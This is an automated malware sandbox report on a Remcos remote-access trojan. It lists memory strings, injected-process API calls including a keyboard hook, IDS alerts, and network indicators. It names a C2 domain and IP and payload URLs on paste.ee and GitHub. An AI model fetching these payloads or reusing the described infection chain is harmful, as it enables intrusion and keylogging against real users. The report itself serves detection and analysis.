Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1625573790.00007FF886E80000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_0041A01B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_0040B28E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_0040838E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_004087A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_00407848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004068CD FindFirstFileW,FindNextFileW,	11_2_004068CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0044BA59 FindFirstFileExA,	11_2_0044BA59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0040AA71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_00417AAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0040AC78

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_00406D28

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49709 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49713 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49714 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49726 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49730 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49712 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49717 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49737 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49744 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49743 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49725 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49711 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49732 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49718 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49727 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49721 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49742 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49751 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49745 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49740 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49731 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49735 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49710 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49729 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49716 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49733 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49748 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49722 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49715 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49719 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49720 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49728 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49746 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49750 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49736 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49749 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49734 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49724 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49738 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49752 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49747 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49741 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49739 -> 45.133.172.96:55543
Source: Network traffic	Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.9:49708 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 188.114.96.3:443 -> 192.168.2.9:49708
Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 188.114.96.3:443 -> 192.168.2.9:49708

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: ab9001.ddns.net

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Uses dynamic DNS services

Source: unknown

DNS query: name: ab9001.ddns.net

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10

Source: global traffic

TCP traffic: 192.168.2.9:49709 -> 45.133.172.96:55543

Source: global traffic	HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/5vQgr/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 185.199.108.133 185.199.108.133

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_00424A66 recv,

11_2_00424A66

Source: global traffic	HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/5vQgr/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: ab9001.ddns.net

Source: AddInProcess32.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1575148283.000001B0571DA000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000008.00000002.1550060124.000001B047B5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://paste.ee
Source: powershell.exe, 00000008.00000002.1550060124.000001B0462E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1550060124.000001B0477A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000005.00000002.1474559091.000001CE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1628137631.0000024680105000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1550060124.000001B0460C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1550060124.000001B0477F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.1550060124.000001B0462E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.1474559091.000001CE815CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000005.00000002.1474559091.000001CE81619000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1628137631.000002468005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1628137631.000002468004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1550060124.000001B0460C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000008.00000002.1550060124.000001B0462E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1550060124.000001B04702C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1550060124.000001B047B5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1550060124.000001B0477F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.1550060124.000001B0477F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000008.00000002.1550060124.000001B046516000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000008.00000002.1550060124.000001B046516000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/5vQgr/0
Source: powershell.exe, 00000008.00000002.1550060124.000001B0477A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000008.00000002.1550060124.000001B04702C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1550060124.000001B0462E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000008.00000002.1550060124.000001B0462E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000008.00000002.1550060124.000001B0462E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtYQD;
Source: powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49708 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_00409340 SetWindowsHookExA 0000000D,0040932C,00000000

11_2_00409340

Installs a global keyboard hook

